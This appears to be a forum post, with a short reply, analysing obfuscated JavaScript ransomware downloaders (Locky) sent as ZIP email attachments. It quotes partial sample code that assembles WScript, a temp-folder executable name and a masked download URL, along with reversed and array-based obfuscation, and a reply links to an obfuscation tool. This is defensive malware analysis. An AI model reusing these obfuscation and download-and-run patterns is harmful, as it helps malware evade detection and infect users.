One reason the Ransomware JS files arriving as email attachments are not being flagged consistently by much anti-malware when the user runs the file is the obfuscation (disguising) of the code. Nine years ago, this technique was discussed in a isc.sans.edu Diary: https://isc.sans.edu/diary/Raising the bar: dynamic JavaScript obfuscation/3219 The early Ransomeware JS files had rather simple obfuscation. Here is part of a file identified as "CRDF Trojan Trojan-Ransom Script Locky": Code: var ______zacopies /* _r_cmt */ = "Cr"+"e"+"ateObject"; ______zabodyaxes = "%TEMP%/"; ______zbseptember = "sQwetLkP.e" + "xe"; terms = "W"+"S"+"c"+"ript"; abases = "ht"+"tp"+":/"+"/XXXX-v.c"+"om/"+"2e2"+"2df"+"s"; If we strip away the junk, the file's intentions become clear: Code: Create Object" = "%TEMP%/" = "sQwetLkP.exe" terms = "WScript" abases = "http://XXXX.com/2e22dfs" The file downloads the Ransomware executable from the URL coded in the file, and runs it from the user's temp folder as "sQwetLkP.exe". Note that WScript is doing the work. These JS files have been classified as "Ransomware Downloaders." A month or so later, more sophisticated techniques were being used. Part of a file identified as from the Trojan-Ransom Script Locky group: Code: var a9Mo9HGi8W = \n\r;) (]vZPOPKS + 8eIAC[4oHPX \n\r\n\r;)21 ,gDIQIKD(]9pBAJ + sFFJCBN + 9zGOS + bGKO[4oHPX \n\r;))6eJQUICQ(gVTQ(]5tOTPBPD + eGPZ + jWJEHHH[4oHPX \n\r;)(]xEUT[4oHPX \n\r ;/* cYq cVm iAC */ sNGY = ])lMCCYKE (lRTW + yMKLZLG + 9jFJB[4oHPX \n\r;8uSPA = ]))(};vTIN nruter{)(qDYF noitcnuf ([4oHPX \n\r;)rKIUQYC + dAYQZTO + 5mNTKOZB + 4qKUSOZG + 6tTPO(]kAHT + 6dHTB + 5pJTH + zEDNHMJ[tpircSW = 4oHPX rav \n\r{\n\r)6eJQUICQ ,gDIQIKD (3yEFK noitcnuf\n\r\n\r\n\r;}\n\r;4rGVL nruter \n\r \n\r;)""(]oULRNFM + )dXVW (pSGV[gERMOEX = 4rGVL \n\r \n\r} \n\r;))8wVTLVUN(]lXLE + dQOJPWA + kERI [gnirtS(hsup.gERMOEX \n\r};]uUGSKYX[5jESWSUF = 8wVTLVUN{ \n\r esle \n \r};uUGSKYX = 8wVTLVUN{ \n\r )821 < uUGSKYX( fi \n]1lVPPMYW[6eJQUICQ = uUGSKYX \n\ ... a9Mo9HGi8W = a9Mo9HGi8W["split"](''); ... The "var" at the beginning is a variable which is referenced at the end of the file; this does the de-obfuscation, resulting in the same action as the first file: downloading the Ransomware malware executable. Recently, I've seen this type of JS file: Code: var ayFkjg = [';', '', '}', '', ' ', '', ';', '', ')', '', '(', '', ']', '', '7', '', 'p', '', 'A', '', 'D', '', '[', '', '3', '', 's', '', 'S', '', ' ', '', ';', '', ')', '', '2', '', ' ', '', ',', '', '2', '', 'j', '', 'A', '', 'K', '', 'H', '', '(', '', ']', '', 'q', '', 'J', '', 'U', '', 'Z', '', ' ', '', '+', '', ' ', '', 'u', '', 'C', '', 'A', '', 'T', '', 'C', '', ' ', '', '+', '', ' ', '', '0', '', 'i', '', 'V', '', 'Q', '', '[', '', '3', '', 's', '', 'S', '' ' ', '', ';', '', ')', '', ')', '', '5', '', 'p', '', 'R', '', 'T', '', '(', '', 'a', '', 'G', '', 'K', '', '(', '', ']', ... w = ayFkjg; y = w.reverse(); y = y.join(''); Same action as above, when de-obfuscated: to download the Ransomware malware. All of the emails I've received have the JS file in a normal ZIP file. Someone earlier wrote that ZIP files can be configured to automatically launch their contents when the ZIP file is opened without having to click on the file inside. I have not found this to work in the dozen or so I've seen. Nonetheless, a secure way to look at the contents of a ZIP file is to r-click on the ZIP file and select "Extract All." You have the option to select the directory in which to extract the file(s). This is the way Windows handles ZIP files by default. Other programs may be different. You may ask, Why would anyone open a JS file received by email? Well, the email contents can be quite inviting, if the person is not alert. Such as, For a closer look at Ransomware JS files, just search on line, and you will find several research sites. ---- rich
Malware developers using all the following for script downloads/e-mail attachments; encryption, packing, and obfuscation. Beginners guide here: https://www.nettitude.co.uk/beginners-guide-obfuscation/ Complete obfuscation tool here: http://javascript-source.com/javascript-obfuscator.html - one of many that are available.
